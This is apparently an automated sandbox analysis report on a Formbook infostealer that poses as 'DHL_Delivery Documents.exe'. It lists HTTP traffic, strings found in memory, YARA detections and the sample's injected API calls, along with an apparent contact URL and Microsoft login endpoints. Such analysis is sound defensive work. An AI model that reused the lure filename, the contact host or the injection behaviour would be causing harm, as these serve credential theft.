  Data Ascii: b8L=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~90
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 23 May 2024 18:29:35 GMT
  Content-Type: text/html; charset=iso-8859-1
  Transfer-Encoding: chunked
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2WnHi2%2Fo01hPAdXMSd%2BMF9RsM2LjNCZc931bGtsT0%2BpaQ9liOpp4p1QAGFrE6%2BJ%2B%2F0GmQF0%2BrXcPteoLI74c2xDdEFGBLHQ21583ib450RLHFXQmKPbBNCNGS3sWZ2m9TndGw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 88871cc21cd58c45-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: adL=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~b90
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 23 May 2024 18:29:38 GMT
  Content-Type: text/html; charset=iso-8859-1
  Transfer-Encoding: chunked
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goUQgH9ohKt1fmph30M6OlTfSSoEVX%2BnI%2BjIrBrD%2F3AN%2BT5WbfBSA7l9RjOMhkuzkRCPVlWXzuEnxV3Aurtf3H7jwG3Z4%2BH55oS6ywv69uZWnVIYB2k2LS0mkZzUWjnXkfzZKw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 88871cd1ee21423f-EWR
  alt-svc: h3=":443"; ma=86400
  Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 65 79 6a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
  Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0eyj/ was not found on this server.</p></body></html>0
            Source: DHL_Delivery Documents.exe, 00000000.00000002.2080507854.0000000002E6E000.00000004.00000800.00020000.00000000.sdmp, YybGLWQSx.exe, 00000009.00000002.2305807020.00000000024D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr String found in binary or memory: http://tempuri.org/DataSet1.xsd
            Source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr String found in binary or memory: http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3282139682.0000000004CE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.alexbruma.com
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3282139682.0000000004CE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.alexbruma.com/0eyj/
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: setx.exe, 00000012.00000003.2891319373.00000000074A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara match File source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: DHL_Delivery Documents.exe, BufferingPage.cs Long String: Length: 150953
            Source: YybGLWQSx.exe.0.dr, BufferingPage.cs Long String: Length: 150953
            Source: 18.2.setx.exe.320cd08.2.raw.unpack, BufferingPage.cs Long String: Length: 150953
            Source: 19.0.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.cs Long String: Length: 150953
            Source: 19.2.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.cs Long String: Length: 150953
            Source: initial sample Static PE information: Filename: DHL_Delivery Documents.exe
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0042B543 NtClose, 8_2_0042B543
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0040A88F NtAllocateVirtualMemory, 8_2_0040A88F
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52B60 NtClose,LdrInitializeThunk, 8_2_01C52B60
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_01C52DF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_01C52C70
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C535C0 NtCreateMutant,LdrInitializeThunk, 8_2_01C535C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C54340 NtSetContextThread, 8_2_01C54340
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C54650 NtSuspendThread, 8_2_01C54650
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52BE0 NtQueryValueKey, 8_2_01C52BE0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52BF0 NtAllocateVirtualMemory, 8_2_01C52BF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52B80 NtQueryInformationFile, 8_2_01C52B80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52BA0 NtEnumerateValueKey, 8_2_01C52BA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52AD0 NtReadFile, 8_2_01C52AD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52AF0 NtWriteFile, 8_2_01C52AF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52AB0 NtWaitForSingleObject, 8_2_01C52AB0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52DD0 NtDelayExecution, 8_2_01C52DD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52DB0 NtEnumerateKey, 8_2_01C52DB0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52D00 NtSetInformationFile, 8_2_01C52D00
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52D10 NtMapViewOfSection, 8_2_01C52D10
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52D30 NtUnmapViewOfSection, 8_2_01C52D30
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52CC0 NtQueryVirtualMemory, 8_2_01C52CC0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52CF0 NtOpenProcess, 8_2_01C52CF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52CA0 NtQueryInformationToken, 8_2_01C52CA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52C60 NtCreateKey, 8_2_01C52C60
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52C00 NtQueryInformationProcess, 8_2_01C52C00
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52FE0 NtCreateFile, 8_2_01C52FE0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52F90 NtProtectVirtualMemory, 8_2_01C52F90
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52FA0 NtQuerySection, 8_2_01C52FA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52FB0 NtResumeThread, 8_2_01C52FB0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52F60 NtCreateProcessEx, 8_2_01C52F60
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52F30 NtCreateSection, 8_2_01C52F30
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52EE0 NtQueueApcThread, 8_2_01C52EE0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52E80 NtReadVirtualMemory, 8_2_01C52E80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52EA0 NtAdjustPrivilegesToken, 8_2_01C52EA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52E30 NtWriteVirtualMemory, 8_2_01C52E30
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C53090 NtSetValueKey, 8_2_01C53090
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C53010 NtOpenDirectoryObject, 8_2_01C53010
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C539B0 NtGetContextThread, 8_2_01C539B0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C53D70 NtOpenThread, 8_2_01C53D70
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C53D10 NtOpenProcessToken, 8_2_01C53D10
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C54340 NtSetContextThread,LdrInitializeThunk, 18_2_02C54340
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C54650 NtSuspendThread,LdrInitializeThunk, 18_2_02C54650
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52AD0 NtReadFile,LdrInitializeThunk, 18_2_02C52AD0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52AF0 NtWriteFile,LdrInitializeThunk, 18_2_02C52AF0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52BE0 NtQueryValueKey,LdrInitializeThunk, 18_2_02C52BE0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_02C52BF0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52BA0 NtEnumerateValueKey,LdrInitializeThunk, 18_2_02C52BA0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52B60 NtClose,LdrInitializeThunk, 18_2_02C52B60
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52EE0 NtQueueApcThread,LdrInitializeThunk, 18_2_02C52EE0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52E80 NtReadVirtualMemory,LdrInitializeThunk, 18_2_02C52E80
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52FE0 NtCreateFile,LdrInitializeThunk, 18_2_02C52FE0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52FB0 NtResumeThread,LdrInitializeThunk, 18_2_02C52FB0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52F30 NtCreateSection,LdrInitializeThunk, 18_2_02C52F30
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52CA0 NtQueryInformationToken,LdrInitializeThunk, 18_2_02C52CA0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52C60 NtCreateKey,LdrInitializeThunk, 18_2_02C52C60
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52C70 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_02C52C70
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52DD0 NtDelayExecution,LdrInitializeThunk, 18_2_02C52DD0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52DF0 NtQuerySystemInformation,LdrInitializeThunk, 18_2_02C52DF0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52D10 NtMapViewOfSection,LdrInitializeThunk, 18_2_02C52D10
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52D30 NtUnmapViewOfSection,LdrInitializeThunk, 18_2_02C52D30
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C535C0 NtCreateMutant,LdrInitializeThunk, 18_2_02C535C0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C539B0 NtGetContextThread,LdrInitializeThunk, 18_2_02C539B0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52AB0 NtWaitForSingleObject, 18_2_02C52AB0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52B80 NtQueryInformationFile, 18_2_02C52B80
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52EA0 NtAdjustPrivilegesToken, 18_2_02C52EA0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52E30 NtWriteVirtualMemory, 18_2_02C52E30
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52F90 NtProtectVirtualMemory, 18_2_02C52F90
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52FA0 NtQuerySection, 18_2_02C52FA0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52F60 NtCreateProcessEx, 18_2_02C52F60
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52CC0 NtQueryVirtualMemory, 18_2_02C52CC0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52CF0 NtOpenProcess, 18_2_02C52CF0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52C00 NtQueryInformationProcess, 18_2_02C52C00
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52DB0 NtEnumerateKey, 18_2_02C52DB0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52D00 NtSetInformationFile, 18_2_02C52D00
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C53090 NtSetValueKey, 18_2_02C53090
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C53010 NtOpenDirectoryObject, 18_2_02C53010
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C53D70 NtOpenThread, 18_2_02C53D70
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C53D10 NtOpenProcessToken, 18_2_02C53D10
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_00438020 NtDeleteFile, 18_2_00438020
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_004380B0 NtClose, 18_2_004380B0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_00438200 NtAllocateVirtualMemory, 18_2_00438200
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_00437DE0 NtCreateFile, 18_2_00437DE0
            Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_00437F40 NtReadFile, 18_2_00437F40
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015DD34C13_2_015DD34C
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F33F313_2_015F33F3
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160D2F013_2_0160D2F0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160B2C013_2_0160B2C0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F52A013_2_015F52A0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015E146013_2_015E1460
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_016374E013_2_016374E0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F349713_2_015F3497
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015FB73013_2_015FB730
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F995013_2_015F9950
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160B95013_2_0160B950
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F599013_2_015F5990
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0165D80013_2_0165D800
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F38E013_2_015F38E0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01665BF013_2_01665BF0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0162DBF913_2_0162DBF9
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160FB8013_2_0160FB80
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01663A6C13_2_01663A6C
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F3D4013_2_015F3D40
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160FDC013_2_0160FDC0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01609C2013_2_01609C20
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01669C3213_2_01669C32
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F1F9213_2_015F1F92
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F9EB013_2_015F9EB0
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FF7BC3
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FDA323
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FEE663
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FE0C43
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FE0C41
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FD85C3
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FDA543
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CA02C0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CC0274
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CE03E6
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C2E3F0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDA352
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CB2000
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CD81CC
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CE01AA
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CD41A2
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CA8158
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C10100
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CBA118
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C3C6E0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C1C7C0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C44750
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C20770
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CCE4F6
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CD2446
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CC4420
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CE0591
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C20535
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C1EA80
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CD6BD7
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDAB40
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C4E8F0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C068B8
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C22840
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C2A840
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C229A0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CEA9A6
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C36962
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDEEDB
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C32E90
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDCE93
